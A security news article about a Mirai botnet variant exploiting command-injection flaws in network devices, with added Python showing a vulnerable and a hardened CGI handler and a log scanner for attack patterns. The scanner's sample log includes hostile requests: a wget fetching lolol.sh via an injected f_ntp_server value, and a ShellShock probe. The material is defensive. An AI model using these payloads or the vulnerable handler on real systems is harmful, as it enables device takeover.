Newly Discovered Botnet Targets Network Security Devices
The compromised devices are infected with a variant of the Mirai botnet malware.
The newly discovered botnet targets connected devices affected by critical-severity vulnerabilities, some of which impact network security devices. The attacks are ongoing, and the attackers appear to be weaponizing publicly available exploit code, sometimes only a few hours after the vulnerabilities were published.
What is Mirai and how is it being used in this situation?
Mirai, which translates as ‘future’ in Japanese, is malware that turns networked devices running Linux into remotely controlled bots, which can then be used as part of a botnet in large-scale network attacks.
Its primary targets are online consumer devices such as IP cameras and home routers. Its creators initially used Mirai to DDoS Minecraft servers and the companies offering DDoS protection to those servers, operating a protection racket. The Mirai source code was subsequently published on Hack Forums as open source, and its techniques have since been adapted in other malware projects.
Hundreds of thousands of IoT devices still run with default credentials and settings, which makes them extremely easy to infect. Once infected, a device polls its command-and-control server, which tells it which target to attack.
Exploit code for at least ten vulnerabilities has been leveraged so far; the latest one was added over the weekend and used almost immediately.
The attackers appear to compromise devices with a Mirai variant compiled for the CPU architecture of the target device.
In February, security researchers from Palo Alto Networks’ Unit 42 discovered attacks originating from this botnet and began tracking its activity to learn more about its modus operandi.
It took the botnet operator about a month to integrate exploits for ten vulnerabilities, most of them critical, which lets the botnet reach a wide range of targets.
Most of these vulnerabilities stem from user-supplied data not being properly filtered, which allows an unauthenticated attacker to run arbitrary commands on the device as root.
The researchers state that three of the exploited vulnerabilities have yet to be identified, as the targeted products remain unknown.
Let’s take a more in-depth look at the exploited vulnerabilities.
VisualDoor: SonicWall SSL-VPN Remote Command Injection Vulnerability
This exploit targets the outdated version of Bash shipped on the SonicWall SSL-VPN, which is vulnerable to ShellShock. An attacker can send a crafted Common Gateway Interface (CGI) request to a particular shell script, resulting in unauthenticated remote code execution (RCE).
CVE-2020-25506: D-Link DNS-320 Firewall Remote Command Execution Vulnerability
This exploit targets a command injection vulnerability in the system_mgr.cgi component, which does not properly sanitize the value of the HTTP parameter f_ntp_server, leading to arbitrary command execution.
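The bug class behind this entry, and behind most of the list, is the same: a request parameter is spliced into a shell command line. The following Python is an added example, not code from D-Link or from Unit 42; it borrows only the parameter name f_ntp_server from the page. The CGI handler, the allow-list regex and the use of echo in place of a real ntpdate call are assumptions made so the example runs safely. It shows the vulnerable handler beside a hardened one that validates the value and passes it as a single argv element without a shell.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Hypothetical allow-list for the NTP server parameter: a bare hostname or
# IPv4 literal (letters, digits, dots, hyphens; no whitespace, no shell
# metacharacters). Anything else is rejected before it reaches a command.
NTP_SERVER_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")


def vulnerable_set_ntp(query_string: str) -> str:
    """The bug class from the article: the parameter value is spliced
    straight into a shell command line, so ';', '|', '$(...)' and friends
    become part of the command. 'echo' stands in for the real ntpdate call
    so the example is safe to run."""
    params = parse_qs(query_string)
    server = params.get("f_ntp_server", [""])[0]
    cmd = "echo ntpdate " + server          # untrusted data meets the shell
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_ntp_server(value: str) -> str:
    """Reject anything that is not a plausible hostname or IPv4 literal."""
    if not NTP_SERVER_RE.fullmatch(value):
        raise ValueError("invalid NTP server: %r" % value)
    return value


def hardened_set_ntp(query_string: str) -> str:
    """Same request, fixed: validate against the allow-list, then pass the
    value as one argv element; no shell is involved at all."""
    params = parse_qs(query_string)
    server = validate_ntp_server(params.get("f_ntp_server", [""])[0])
    return subprocess.run(["echo", "ntpdate", server],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    # Constructed query strings; %3B decodes to ';' and %20 to a space.
    benign = "f_ntp_server=pool.ntp.org"
    hostile = "f_ntp_server=pool.ntp.org%3Becho%20INJECTED"
    print(vulnerable_set_ntp(hostile), end="")   # second line shows the injected command ran
    print(hardened_set_ntp(benign), end="")
    try:
        hardened_set_ntp(hostile)
    except ValueError as exc:
        print("rejected:", exc)
```

The argv form alone already stops the injection; the allow-list is kept because a value like `-x` or a newline can still mean something to the program being invoked. Running the CGI process as an unprivileged user instead of root would limit the damage further, but that is a deployment fix outside this snippet.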
CVE-2021-27561 and CVE-2021-27562: Yealink Device Management Pre-Auth ‘root’ Level Remote Code Execution Vulnerability
The exploit chains a pre-auth Server-Side Request Forgery (SSRF) vulnerability with a command injection vulnerability, allowing unauthenticated command execution as root by sending a single HTTPS request to the remote target.
CVE-2021-22502: Micro Focus Operation Bridge Reporter (OBR) Remote Code Execution
The “username” and “password” parameters in requests to the LogonResource API are unsanitized, which allows unauthenticated RCE as root on the OBR server.
CVE-2019-19356: Netis WF2419 Wireless Router Remote Code Execution Vulnerability
This exploit uses an RCE vulnerability in the router’s diagnostic tool utility: an authenticated attacker can execute commands via multiple vulnerable parameters, such as the IP address or domain name fields.
CVE-2020-26919: Netgear ProSAFE Plus Unauthenticated Remote Code Execution Vulnerability
An attacker can execute system commands by requesting the debug web sections directly; because the proper access-control checks are missing, this leads to RCE with administrator privileges.
Besides the vulnerabilities listed above, the botnet exploits a few more that remain unidentified for the time being. Among these are a lang parameter command injection, a key parameter command injection and an op_type parameter command injection.
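Two request shapes recur across this list: a ShellShock-style CGI request (the SonicWall entry) and shell metacharacters in a named parameter (the D-Link, Micro Focus and the three unidentified entries). The following Python is an added detection example, not Unit 42's tooling; it runs over a constructed web-server access log in the common "combined" format, flags both shapes, and uses only the parameter names the page gives. The log lines, paths and addresses (documentation ranges) are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters the article names as command-injection sinks (D-Link f_ntp_server,
# Micro Focus OBR username/password, and the unidentified lang/key/op_type).
WATCHED_PARAMS = {"f_ntp_server", "username", "password", "lang", "key", "op_type"}

# Shell metacharacters that have no business in a hostname, language code or key.
SHELL_META_RE = re.compile(r"[;|&`$\n]")

# The ShellShock trigger: a value that starts like an exported Bash function, '() {'.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Assumed log format: Apache/nginx "combined", User-Agent as the last field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return (client_ip, [findings]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    # ShellShock payloads arrive in any header the CGI wrapper exports as an
    # environment variable; User-Agent and Referer are the ones logged here,
    # and the decoded request target is checked for good measure.
    decoded_target = unquote(m["target"])
    if any(SHELLSHOCK_RE.search(s) for s in (m["ua"], m["referer"], decoded_target)):
        findings.append("shellshock")
    # Command-injection attempts: shell metacharacters inside a watched parameter.
    query = urlsplit(m["target"]).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name in WATCHED_PARAMS and any(SHELL_META_RE.search(v) for v in values):
            findings.append("cmdinj:" + name)
    return m["ip"], findings


def scan(lines):
    """Run classify over a log and keep only the lines that produced findings."""
    alerts = []
    for line in lines:
        result = classify(line)
        if result and result[1]:
            alerts.append(result)
    return alerts


# Constructed sample log (hypothetical paths; addresses from documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2021:10:00:01 +0000] "GET /cgi-bin/system_mgr.cgi?f_ntp_server=pool.ntp.org HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2021:10:00:02 +0000] "GET /cgi-bin/system_mgr.cgi?f_ntp_server=pool.ntp.org%3Bwget%20http%3A%2F%2F198.51.100.7%2Flolol.sh HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2021:10:00:03 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "() { :; }; /bin/sh -c \'echo probe\'"',
    '198.51.100.7 - - [10/Mar/2021:10:00:04 +0000] "POST /cgi-bin/index.cgi?lang=en%7Cid HTTP/1.1" 500 0 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ", ".join(findings))
```

The parameter check is deliberately keyed to parameter names rather than to specific exploit strings, so it also catches the three injections whose target products are still unknown; the cost is that any legitimate value containing `;` or `|` in one of those parameters will be flagged and needs a review step. POST bodies are not in an access log, so for the Micro Focus LogonResource case the same check would have to run on the request body in a WAF or application log instead.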
After successfully compromising a device, the attacker drops several files that let them schedule jobs, create filter rules, run brute-force attacks, and propagate the botnet malware. These include lolol.sh, install.sh, nbrute.[arch], combo.txt and dark.[arch], where [arch] stands for the CPU architecture the binary was built for.